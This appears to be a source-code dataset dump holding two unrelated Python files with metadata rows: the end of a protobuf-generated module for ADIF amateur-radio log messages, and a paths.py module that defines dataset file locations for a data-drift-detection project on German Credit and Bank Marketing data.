serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='station_class', full_name='adif.ContestData.station_class', index=4,
number=5, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='check', full_name='adif.ContestData.check', index=5,
number=6, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='precedence', full_name='adif.ContestData.precedence', index=6,
number=7, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=2174,
serialized_end=2333,
)
_CREDIT = _descriptor.Descriptor(
name='Credit',
full_name='adif.Credit',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='credit', full_name='adif.Credit.credit', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='qsl_medium', full_name='adif.Credit.qsl_medium', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=2335,
serialized_end=2379,
)
_UPLOAD = _descriptor.Descriptor(
name='Upload',
full_name='adif.Upload',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='upload_date', full_name='adif.Upload.upload_date', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='upload_status', full_name='adif.Upload.upload_status', index=1,
number=2, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=2381,
serialized_end=2481,
)
_QSL = _descriptor.Descriptor(
name='Qsl',
full_name='adif.Qsl',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='sent_date', full_name='adif.Qsl.sent_date', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='sent_status', full_name='adif.Qsl.sent_status', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='sent_via', full_name='adif.Qsl.sent_via', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='received_date', full_name='adif.Qsl.received_date', index=3,
number=4, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='received_status', full_name='adif.Qsl.received_status', index=4,
number=5, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='received_via', full_name='adif.Qsl.received_via', index=5,
number=6, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='received_message', full_name='adif.Qsl.received_message', index=6,
number=7, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=2484,
serialized_end=2699,
)
_ADIF.fields_by_name['header'].message_type = _HEADER
_ADIF.fields_by_name['qsos'].message_type = _QSO
_HEADER.fields_by_name['created_timestamp'].message_type = google_dot_protobuf_dot_timestamp__pb2._TIMESTAMP
_QSO_APPDEFINEDENTRY.containing_type = _QSO
_QSO.fields_by_name['logging_station'].message_type = _STATION
_QSO.fields_by_name['contacted_station'].message_type = _STATION
_QSO.fields_by_name['propagation'].message_type = _PROPAGATION
_QSO.fields_by_name['time_on'].message_type = google_dot_protobuf_dot_timestamp__pb2._TIMESTAMP
_QSO.fields_by_name['time_off'].message_type = google_dot_protobuf_dot_timestamp__pb2._TIMESTAMP
_QSO.fields_by_name['contest'].message_type = _CONTESTDATA
_QSO.fields_by_name['credit_submitted'].message_type = _CREDIT
_QSO.fields_by_name['credit_granted'].message_type = _CREDIT
_QSO.fields_by_name['clublog'].message_type = _UPLOAD
_QSO.fields_by_name['hrdlog'].message_type = _UPLOAD
_QSO.fields_by_name['qrzcom'].message_type = _UPLOAD
_QSO.fields_by_name['eqsl'].message_type = _QSL
_QSO.fields_by_name['lotw'].message_type = _QSL
_QSO.fields_by_name['card'].message_type = _QSL
_QSO.fields_by_name['app_defined'].message_type = _QSO_APPDEFINEDENTRY
_UPLOAD.fields_by_name['upload_date'].message_type = google_dot_protobuf_dot_timestamp__pb2._TIMESTAMP
_UPLOAD.fields_by_name['upload_status'].enum_type = _UPLOADSTATUS
_QSL.fields_by_name['sent_date'].message_type = google_dot_protobuf_dot_timestamp__pb2._TIMESTAMP
_QSL.fields_by_name['received_date'].message_type = google_dot_protobuf_dot_timestamp__pb2._TIMESTAMP
DESCRIPTOR.message_types_by_name['Adif'] = _ADIF
DESCRIPTOR.message_types_by_name['Header'] = _HEADER
DESCRIPTOR.message_types_by_name['Qso'] = _QSO
DESCRIPTOR.message_types_by_name['Station'] = _STATION
DESCRIPTOR.message_types_by_name['Propagation'] = _PROPAGATION
DESCRIPTOR.message_types_by_name['ContestData'] = _CONTESTDATA
DESCRIPTOR.message_types_by_name['Credit'] = _CREDIT
DESCRIPTOR.message_types_by_name['Upload'] = _UPLOAD
DESCRIPTOR.message_types_by_name['Qsl'] = _QSL
DESCRIPTOR.enum_types_by_name['UploadStatus'] = _UPLOADSTATUS
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
Adif = _reflection.GeneratedProtocolMessageType('Adif', (_message.Message,), {
'DESCRIPTOR' : _ADIF,
'__module__' : 'adif_pb2'
# @@protoc_insertion_point(class_scope:adif.Adif)
})
_sym_db.RegisterMessage(Adif)
Header = _reflection.GeneratedProtocolMessageType('Header', (_message.Message,), {
'DESCRIPTOR' : _HEADER,
'__module__' : 'adif_pb2'
# @@protoc_insertion_point(class_scope:adif.Header)
})
_sym_db.RegisterMessage(Header)
Qso = _reflection.GeneratedProtocolMessageType('Qso', (_message.Message,), {
'AppDefinedEntry' : _reflection.GeneratedProtocolMessageType('AppDefinedEntry', (_message.Message,), {
'DESCRIPTOR' : _QSO_APPDEFINEDENTRY,
'__module__' : 'adif_pb2'
# @@protoc_insertion_point(class_scope:adif.Qso.AppDefinedEntry)
})
,
'DESCRIPTOR' : _QSO,
'__module__' : 'adif_pb2'
# @@protoc_insertion_point(class_scope:adif.Qso)
})
_sym_db.RegisterMessage(Qso)
_sym_db.RegisterMessage(Qso.AppDefinedEntry)
Station = _reflection.GeneratedProtocolMessageType('Station', (_message.Message,), {
'DESCRIPTOR' : _STATION,
'__module__' : 'adif_pb2'
# @@protoc_insertion_point(class_scope:adif.Station)
})
_sym_db.RegisterMessage(Station)
Propagation = _reflection.GeneratedProtocolMessageType('Propagation', (_message.Message,), {
'DESCRIPTOR' : _PROPAGATION,
'__module__' : 'adif_pb2'
# @@protoc_insertion_point(class_scope:adif.Propagation)
})
_sym_db.RegisterMessage(Propagation)
ContestData = _reflection.GeneratedProtocolMessageType('ContestData', (_message.Message,), {
'DESCRIPTOR' : _CONTESTDATA,
'__module__' : 'adif_pb2'
# @@protoc_insertion_point(class_scope:adif.ContestData)
})
_sym_db.RegisterMessage(ContestData)
Credit = _reflection.GeneratedProtocolMessageType('Credit', (_message.Message,), {
'DESCRIPTOR' : _CREDIT,
'__module__' : 'adif_pb2'
# @@protoc_insertion_point(class_scope:adif.Credit)
})
_sym_db.RegisterMessage(Credit)
Upload = _reflection.GeneratedProtocolMessageType('Upload', (_message.Message,), {
'DESCRIPTOR' : _UPLOAD,
'__module__' : 'adif_pb2'
# @@protoc_insertion_point(class_scope:adif.Upload)
})
_sym_db.RegisterMessage(Upload)
Qsl = _reflection.GeneratedProtocolMessageType('Qsl', (_message.Message,), {
'DESCRIPTOR' : _QSL,
'__module__' : 'adif_pb2'
# @@protoc_insertion_point(class_scope:adif.Qsl)
})
_sym_db.RegisterMessage(Qsl)
DESCRIPTOR._options = None
_QSO_APPDEFINEDENTRY._options = None
# @@protoc_insertion_point(module_scope)
| 51.636066
| 5,483
| 0.742571
| 8,731
| 62,996
| 5.045127
| 0.051082
| 0.064292
| 0.101364
| 0.079071
| 0.809439
| 0.734795
| 0.72685
| 0.715885
| 0.710345
| 0.697269
| 0
| 0.044138
| 0.128945
| 62,996
| 1,219
| 5,484
| 51.678425
| 0.758606
| 0.01089
| 0
| 0.712812
| 1
| 0.003439
| 0.144155
| 0.090603
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.005159
| 0
| 0.005159
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
d43c9f85b610e1de5ab09b60c10f3c287a9952f7
| 16,790
|
py
|
Python
|
src/pipeline/datasets/paths.py
|
guyfreund/data_drift_detection
|
80ca5eb7445b17e04f2aa98c5f6d9ac1fe6d5ac5
|
[
"MIT"
] | null | null | null |
src/pipeline/datasets/paths.py
|
guyfreund/data_drift_detection
|
80ca5eb7445b17e04f2aa98c5f6d9ac1fe6d5ac5
|
[
"MIT"
] | 1
|
2021-12-12T22:13:58.000Z
|
2021-12-17T22:49:39.000Z
|
src/pipeline/datasets/paths.py
|
guyfreund/data_drift_detection
|
80ca5eb7445b17e04f2aa98c5f6d9ac1fe6d5ac5
|
[
"MIT"
] | null | null | null |
import os
################################################################################
# ------------------------------ GERMAN CREDIT --------------------------------#
################################################################################
# ------------------------------ RAW DATA ------------------------------#
GERMAN_CREDIT_DATASET_PATH = os.path.abspath(os.path.join(__file__, "..", "german_credit", "german.data"))
GERMAN_CREDIT_NUMERIC_DATASET_PATH = os.path.abspath(os.path.join(__file__, "..", "german_credit", "german.data-numeric"))
GERMAN_CREDIT_SAMPLED_DATASET_PATH = os.path.abspath(os.path.join(__file__, "..", "german_credit", f"sampled_GermanCreditDataset.csv"))
# ------------------------------ DEPLOYMENT (SYNTHESIZED) DATA ------------------------------#
GERMAN_CREDIT_DEPLOYMENT_DATASET_PATH = os.path.abspath(os.path.join(__file__, "..", "..", "data_generation", "raw_files", f"generated_GermanCreditDataset.csv"))
GERMAN_CREDIT_DEPLOYMENT_DATASET_PLUS_PATH = os.path.abspath(os.path.join(__file__, "..", "..", "data_generation", "raw_files", f"generated_GermanCreditDataset_plus.csv"))
GERMAN_CREDIT_SAMPLED_DEPLOYMENT_DATASET = os.path.abspath(os.path.join(__file__, "..", "..", "data_generation", "raw_files", f"generated_sampled_GermanCreditDataset.csv"))
# ------------------------------ TRAINING DATA ------------------------------#
GERMAN_CREDIT_TRAINING_PROCESSED_DF_PATH = os.path.abspath(os.path.join(__file__, "..", "..", "preprocessing", "raw_files", "GermanCreditDataset.pickle"))
GERMAN_CREDIT_TRAINING_PROCESSED_DF_PLUS_PATH = os.path.abspath(os.path.join(__file__, "..", "..", "preprocessing", "raw_files", "GermanCreditDatasetPlus.pickle"))
GERMAN_CREDIT_TRAINING_FEATURE_METRIC_LIST_PATH = os.path.abspath(os.path.join(__file__, "..", "..", "preprocessing", "raw_files", "GermanCreditDataset_FeatureMetricsList.pickle"))
GERMAN_CREDIT_RETRAINING_DF = os.path.abspath(os.path.join(__file__, "..", "..", "preprocessing", "raw_files", "GermanCreditConcatenatedDataFrame.pickle"))
GERMAN_CREDIT_TRAINING_X_TRAIN = os.path.abspath(os.path.join(__file__, "..", "..", "preprocessing", "raw_files", "GermanCreditDataset_X_train.pickle"))
GERMAN_CREDIT_TRAINING_Y_TRAIN = os.path.abspath(os.path.join(__file__, "..", "..", "preprocessing", "raw_files", "GermanCreditDataset_y_train.pickle"))
GERMAN_CREDIT_TRAINING_X_VALIDATION = os.path.abspath(os.path.join(__file__, "..", "..", "preprocessing", "raw_files", "GermanCreditDataset_X_validation.pickle"))
GERMAN_CREDIT_TRAINING_Y_VALIDATION = os.path.abspath(os.path.join(__file__, "..", "..", "preprocessing", "raw_files", "GermanCreditDataset_y_validation.pickle"))
GERMAN_CREDIT_TRAINING_X_TEST = os.path.abspath(os.path.join(__file__, "..", "..", "preprocessing", "raw_files", "GermanCreditDataset_X_test.pickle"))
GERMAN_CREDIT_TRAINING_Y_TEST = os.path.abspath(os.path.join(__file__, "..", "..", "preprocessing", "raw_files", "GermanCreditDataset_y_test.pickle"))
GERMAN_CREDIT_RETRAINING_X_TRAIN = os.path.abspath(os.path.join(__file__, "..", "..", "preprocessing", "raw_files", "GermanCreditSampledTrainingTrainDataset_GermanCreditSampledDeploymentDataset_X_train.pickle"))
GERMAN_CREDIT_RETRAINING_Y_TRAIN = os.path.abspath(os.path.join(__file__, "..", "..", "preprocessing", "raw_files", "GermanCreditSampledTrainingTrainDataset_GermanCreditSampledDeploymentDataset_y_train.pickle"))
GERMAN_CREDIT_RETRAINING_X_VALIDATION = os.path.abspath(os.path.join(__file__, "..", "..", "preprocessing", "raw_files", "GermanCreditSampledTrainingTrainDataset_GermanCreditSampledDeploymentDataset_X_validation.pickle"))
GERMAN_CREDIT_RETRAINING_Y_VALIDATION = os.path.abspath(os.path.join(__file__, "..", "..", "preprocessing", "raw_files", "GermanCreditSampledTrainingTrainDataset_GermanCreditSampledDeploymentDataset_y_validation.pickle"))
GERMAN_CREDIT_RETRAINING_X_TEST = os.path.abspath(os.path.join(__file__, "..", "..", "preprocessing", "raw_files", "GermanCreditSampledTrainingTrainDataset_GermanCreditSampledDeploymentDataset_X_test.pickle"))
GERMAN_CREDIT_RETRAINING_Y_TEST = os.path.abspath(os.path.join(__file__, "..", "..", "preprocessing", "raw_files", "GermanCreditSampledTrainingTrainDataset_GermanCreditSampledDeploymentDataset_y_test.pickle"))
GERMAN_CREDIT_TRAINING_X_TRAIN_RAW = os.path.abspath(os.path.join(__file__, "..", "..", "preprocessing", "raw_files", "GermanCreditDataset_X_train_raw.pickle"))
GERMAN_CREDIT_TRAINING_Y_TRAIN_RAW = os.path.abspath(os.path.join(__file__, "..", "..", "preprocessing", "raw_files", "GermanCreditDataset_y_train_raw.pickle"))
GERMAN_CREDIT_TRAINING_X_VALIDATION_RAW = os.path.abspath(os.path.join(__file__, "..", "..", "preprocessing", "raw_files", "GermanCreditDataset_X_validation_raw.pickle"))
GERMAN_CREDIT_TRAINING_Y_VALIDATION_RAW = os.path.abspath(os.path.join(__file__, "..", "..", "preprocessing", "raw_files", "GermanCreditDataset_y_validation_raw.pickle"))
GERMAN_CREDIT_TRAINING_X_TEST_RAW = os.path.abspath(os.path.join(__file__, "..", "..", "preprocessing", "raw_files", "GermanCreditDataset_X_test_raw.pickle"))
GERMAN_CREDIT_TRAINING_Y_TEST_RAW = os.path.abspath(os.path.join(__file__, "..", "..", "preprocessing", "raw_files", "GermanCreditDataset_y_test_raw.pickle"))
GERMAN_CREDIT_RETRAINING_X_TRAIN_RAW = os.path.abspath(os.path.join(__file__, "..", "..", "preprocessing", "raw_files", "GermanCreditSampledTrainingTrainDataset_GermanCreditSampledDeploymentDataset_X_train_raw.pickle"))
GERMAN_CREDIT_RETRAINING_Y_TRAIN_RAW = os.path.abspath(os.path.join(__file__, "..", "..", "preprocessing", "raw_files", "GermanCreditSampledTrainingTrainDataset_GermanCreditSampledDeploymentDataset_y_train_raw.pickle"))
GERMAN_CREDIT_RETRAINING_X_VALIDATION_RAW = os.path.abspath(os.path.join(__file__, "..", "..", "preprocessing", "raw_files", "GermanCreditSampledTrainingTrainDataset_GermanCreditSampledDeploymentDataset_X_validation_raw.pickle"))
GERMAN_CREDIT_RETRAINING_Y_VALIDATION_RAW = os.path.abspath(os.path.join(__file__, "..", "..", "preprocessing", "raw_files", "GermanCreditSampledTrainingTrainDataset_GermanCreditSampledDeploymentDataset_y_validation_raw.pickle"))
GERMAN_CREDIT_RETRAINING_X_TEST_RAW = os.path.abspath(os.path.join(__file__, "..", "..", "preprocessing", "raw_files", "GermanCreditSampledTrainingTrainDataset_GermanCreditSampledDeploymentDataset_X_test_raw.pickle"))
GERMAN_CREDIT_RETRAINING_Y_TEST_RAW = os.path.abspath(os.path.join(__file__, "..", "..", "preprocessing", "raw_files", "GermanCreditSampledTrainingTrainDataset_GermanCreditSampledDeploymentDataset_y_test_raw.pickle"))
# ------------------------------ Backup and Testing ------------------------------#
# Not-drifted
SMOTENC_GERMAN_CREDIT_DEPLOYMENT_DATASET_PATH_NORMAL = os.path.abspath(os.path.join(__file__, "..", "..", "data_generation", "raw_files", f"smotenc_generated_GermanCreditDataset_normal.csv"))
SMOTENC_GERMAN_CREDIT_DEPLOYMENT_DATASET_PLUS_PATH_NORMAL = os.path.abspath(os.path.join(__file__, "..", "..", "data_generation", "raw_files", f"smotenc_generated_GermanCreditDataset_plus_normal.csv"))
GAN_GERMAN_CREDIT_DEPLOYMENT_DATASET_PATH_NORMAL = os.path.abspath(os.path.join(__file__, "..", "..", "data_generation", "raw_files", f"gan_generated_GermanCreditDataset_normal.csv"))
GAN_GERMAN_CREDIT_DEPLOYMENT_DATASET_PLUS_PATH_NORMAL = os.path.abspath(os.path.join(__file__, "..", "..", "data_generation", "raw_files", f"gan_generated_GermanCreditDataset_plus_normal.csv"))
# Drifted
SMOTENC_GERMAN_CREDIT_DEPLOYMENT_DATASET_PATH_DRIFT = os.path.abspath(os.path.join(__file__, "..", "..", "data_generation", "raw_files", f"smotenc_generated_GermanCreditDataset_drift.csv"))
SMOTENC_GERMAN_CREDIT_DEPLOYMENT_DATASET_PLUS_PATH_DRIFT = os.path.abspath(os.path.join(__file__, "..", "..", "data_generation", "raw_files", f"smotenc_generated_GermanCreditDataset_plus_drift.csv"))
GAN_GERMAN_CREDIT_DEPLOYMENT_DATASET_PATH_DRIFT = os.path.abspath(os.path.join(__file__, "..", "..", "data_generation", "raw_files", f"gan_generated_GermanCreditDataset_drift.csv"))
GAN_GERMAN_CREDIT_DEPLOYMENT_DATASET_PLUS_PATH_DRIFT = os.path.abspath(os.path.join(__file__, "..", "..", "data_generation", "raw_files", f"gan_generated_GermanCreditDataset_plus_drift.csv"))
################################################################################
# ------------------------------ BANK MARKETING ------------------------------#
################################################################################
# ------------------------------ RAW DATA ------------------------------#
BANK_MARKETING_DATASET_PATH = os.path.abspath(os.path.join(__file__, "..", "bank_marketing", "bank.csv"))
BANK_MARKETING_FULL_DATASET_PATH = os.path.abspath(os.path.join(__file__, "..", "bank_marketing", "bank-full.csv"))
BANK_MARKETING_ADDITIONAL_DATASET_PATH = os.path.abspath(os.path.join(__file__, "..", "bank_marketing", "bank-additional.csv"))
BANK_MARKETING_ADDITIONAL_FULL_DATASET_PATH = os.path.abspath(os.path.join(__file__, "..", "bank_marketing", "bank-additional-full.csv"))
BANK_MARKETING_SAMPLED_DATASET_PATH = os.path.abspath(os.path.join(__file__, "..", "bank_marketing", f"sampled_BankMarketingDataset.csv"))
# ------------------------------ DEPLOYMENT (SYNTHESIZED) DATA ------------------------------#
BANK_MARKETING_DEPLOYMENT_DATASET_PATH = os.path.abspath(os.path.join(__file__, "..", "..", "data_generation", "raw_files", f"generated_BankMarketingDataset.csv"))
BANK_MARKETING_DEPLOYMENT_DATASET_PLUS_PATH = os.path.abspath(os.path.join(__file__, "..", "..", "data_generation", "raw_files", f"generated_BankMarketingDataset_plus.csv"))
BANK_MARKETING_SAMPLED_DEPLOYMENT_DATASET = os.path.abspath(os.path.join(__file__, "..", "..", "data_generation", "raw_files", f"generated_sampled_BankMarketingDataset.csv"))
# ------------------------------ TRAINING DATA ------------------------------#
BANK_MARKETING_TRAINING_PROCESSED_DF_PATH = os.path.abspath(os.path.join(__file__, "..", "..", "preprocessing", "raw_files", "BankMarketingDataset.pickle"))
BANK_MARKETING_TRAINING_PROCESSED_DF_PLUS_PATH = os.path.abspath(os.path.join(__file__, "..", "..", "preprocessing", "raw_files", "BankMarketingDatasetPlus.pickle"))
BANK_MARKETING_TRAINING_FEATURE_METRIC_LIST_PATH = os.path.abspath(os.path.join(__file__, "..", "..", "preprocessing", "raw_files", "BankMarketingDataset_FeatureMetricsList.pickle"))
BANK_MARKETING_RETRAINING_DF = os.path.abspath(os.path.join(__file__, "..", "..", "preprocessing", "raw_files", "BankMarketingConcatenatedDataFrame.pickle"))
BANK_MARKETING_TRAINING_X_TRAIN = os.path.abspath(os.path.join(__file__, "..", "..", "preprocessing", "raw_files", "BankMarketingDataset_X_train.pickle"))
BANK_MARKETING_TRAINING_Y_TRAIN = os.path.abspath(os.path.join(__file__, "..", "..", "preprocessing", "raw_files", "BankMarketingDataset_y_train.pickle"))
BANK_MARKETING_TRAINING_X_VALIDATION = os.path.abspath(os.path.join(__file__, "..", "..", "preprocessing", "raw_files", "BankMarketingDataset_X_validation.pickle"))
BANK_MARKETING_TRAINING_Y_VALIDATION = os.path.abspath(os.path.join(__file__, "..", "..", "preprocessing", "raw_files", "BankMarketingDataset_y_validation.pickle"))
BANK_MARKETING_TRAINING_X_TEST = os.path.abspath(os.path.join(__file__, "..", "..", "preprocessing", "raw_files", "BankMarketingDataset_X_test.pickle"))
BANK_MARKETING_TRAINING_Y_TEST = os.path.abspath(os.path.join(__file__, "..", "..", "preprocessing", "raw_files", "BankMarketingDataset_y_test.pickle"))
BANK_MARKETING_RETRAINING_X_TRAIN = os.path.abspath(os.path.join(__file__, "..", "..", "preprocessing", "raw_files", "BankMarketingSampledTrainingTrainDataset_BankMarketingSampledDeploymentDataset_X_train.pickle"))
BANK_MARKETING_RETRAINING_Y_TRAIN = os.path.abspath(os.path.join(__file__, "..", "..", "preprocessing", "raw_files", "BankMarketingSampledTrainingTrainDataset_BankMarketingSampledDeploymentDataset_y_train.pickle"))
BANK_MARKETING_RETRAINING_X_VALIDATION = os.path.abspath(os.path.join(__file__, "..", "..", "preprocessing", "raw_files", "BankMarketingSampledTrainingTrainDataset_BankMarketingSampledDeploymentDataset_X_validation.pickle"))
BANK_MARKETING_RETRAINING_Y_VALIDATION = os.path.abspath(os.path.join(__file__, "..", "..", "preprocessing", "raw_files", "BankMarketingSampledTrainingTrainDataset_BankMarketingSampledDeploymentDataset_y_validation.pickle"))
BANK_MARKETING_RETRAINING_X_TEST = os.path.abspath(os.path.join(__file__, "..", "..", "preprocessing", "raw_files", "BankMarketingSampledTrainingTrainDataset_BankMarketingSampledDeploymentDataset_X_test.pickle"))
BANK_MARKETING_RETRAINING_Y_TEST = os.path.abspath(os.path.join(__file__, "..", "..", "preprocessing", "raw_files", "BankMarketingSampledTrainingTrainDataset_BankMarketingSampledDeploymentDataset_y_test.pickle"))
BANK_MARKETING_TRAINING_X_TRAIN_RAW = os.path.abspath(os.path.join(__file__, "..", "..", "preprocessing", "raw_files", "BankMarketingDataset_X_train_raw.pickle"))
BANK_MARKETING_TRAINING_Y_TRAIN_RAW = os.path.abspath(os.path.join(__file__, "..", "..", "preprocessing", "raw_files", "BankMarketingDataset_y_train_raw.pickle"))
BANK_MARKETING_TRAINING_X_VALIDATION_RAW = os.path.abspath(os.path.join(__file__, "..", "..", "preprocessing", "raw_files", "BankMarketingDataset_X_validation_raw.pickle"))
BANK_MARKETING_TRAINING_Y_VALIDATION_RAW = os.path.abspath(os.path.join(__file__, "..", "..", "preprocessing", "raw_files", "BankMarketingDataset_y_validation_raw.pickle"))
BANK_MARKETING_TRAINING_X_TEST_RAW = os.path.abspath(os.path.join(__file__, "..", "..", "preprocessing", "raw_files", "BankMarketingDataset_X_test_raw.pickle"))
BANK_MARKETING_TRAINING_Y_TEST_RAW = os.path.abspath(os.path.join(__file__, "..", "..", "preprocessing", "raw_files", "BankMarketingDataset_y_test_raw.pickle"))
BANK_MARKETING_RETRAINING_X_TRAIN_RAW = os.path.abspath(os.path.join(__file__, "..", "..", "preprocessing", "raw_files", "BankMarketingSampledTrainingTrainDataset_BankMarketingSampledDeploymentDataset_X_train_raw.pickle"))
BANK_MARKETING_RETRAINING_Y_TRAIN_RAW = os.path.abspath(os.path.join(__file__, "..", "..", "preprocessing", "raw_files", "BankMarketingSampledTrainingTrainDataset_BankMarketingSampledDeploymentDataset_y_train_raw.pickle"))
BANK_MARKETING_RETRAINING_X_VALIDATION_RAW = os.path.abspath(os.path.join(__file__, "..", "..", "preprocessing", "raw_files", "BankMarketingSampledTrainingTrainDataset_BankMarketingSampledDeploymentDataset_X_validation_raw.pickle"))
BANK_MARKETING_RETRAINING_Y_VALIDATION_RAW = os.path.abspath(os.path.join(__file__, "..", "..", "preprocessing", "raw_files", "BankMarketingSampledTrainingTrainDataset_BankMarketingSampledDeploymentDataset_y_validation_raw.pickle"))
BANK_MARKETING_RETRAINING_X_TEST_RAW = os.path.abspath(os.path.join(__file__, "..", "..", "preprocessing", "raw_files", "BankMarketingSampledTrainingTrainDataset_BankMarketingSampledDeploymentDataset_X_test_raw.pickle"))
BANK_MARKETING_RETRAINING_Y_TEST_RAW = os.path.abspath(os.path.join(__file__, "..", "..", "preprocessing", "raw_files", "BankMarketingSampledTrainingTrainDataset_BankMarketingSampledDeploymentDataset_y_test_raw.pickle"))
# ------------------------------ Backup and Testing ------------------------------#
# Non-Drifted
SMOTENC_BANK_MARKETING_DEPLOYMENT_DATASET_PATH_NORMAL = os.path.abspath(os.path.join(__file__, "..", "..", "data_generation", "raw_files", f"smotenc_generated_BankMarketingDataset_normal.csv"))
SMOTENC_BANK_MARKETING_DEPLOYMENT_DATASET_PLUS_PATH_NORMAL = os.path.abspath(os.path.join(__file__, "..", "..", "data_generation", "raw_files", f"smotenc_generated_BankMarketingDataset_plus_normal.csv"))
GAN_BANK_MARKETING_DEPLOYMENT_DATASET_PATH_NORMAL = os.path.abspath(os.path.join(__file__, "..", "..", "data_generation", "raw_files", f"gan_generated_BankMarketingDataset.csv_normal"))
GAN_BANK_MARKETING_DEPLOYMENT_DATASET_PLUS_PATH_NORMAL = os.path.abspath(os.path.join(__file__, "..", "..", "data_generation", "raw_files", f"gan_generated_BankMarketingDataset_plus_normal.csv"))
# Drifted
SMOTENC_BANK_MARKETING_DEPLOYMENT_DATASET_PATH_DRIFT = os.path.abspath(os.path.join(__file__, "..", "..", "data_generation", "raw_files", f"smotenc_generated_BankMarketingDataset_drift.csv"))
SMOTENC_BANK_MARKETING_DEPLOYMENT_DATASET_PLUS_PATH_DRIFT = os.path.abspath(os.path.join(__file__, "..", "..", "data_generation", "raw_files", f"smotenc_generated_BankMarketingDataset_plus_drift.csv"))
GAN_BANK_MARKETING_DEPLOYMENT_DATASET_PATH_DRIFT = os.path.abspath(os.path.join(__file__, "..", "..", "data_generation", "raw_files", f"gan_generated_BankMarketingDataset_drift.csv"))
GAN_BANK_MARKETING_DEPLOYMENT_DATASET_PLUS_PATH_DRIFT = os.path.abspath(os.path.join(__file__, "..", "..", "data_generation", "raw_files", f"gan_generated_BankMarketingDataset_plus_drift.csv"))
| 132.204724
| 232
| 0.752889
| 1,824
| 16,790
| 6.336623
| 0.032895
| 0.089289
| 0.09673
| 0.111611
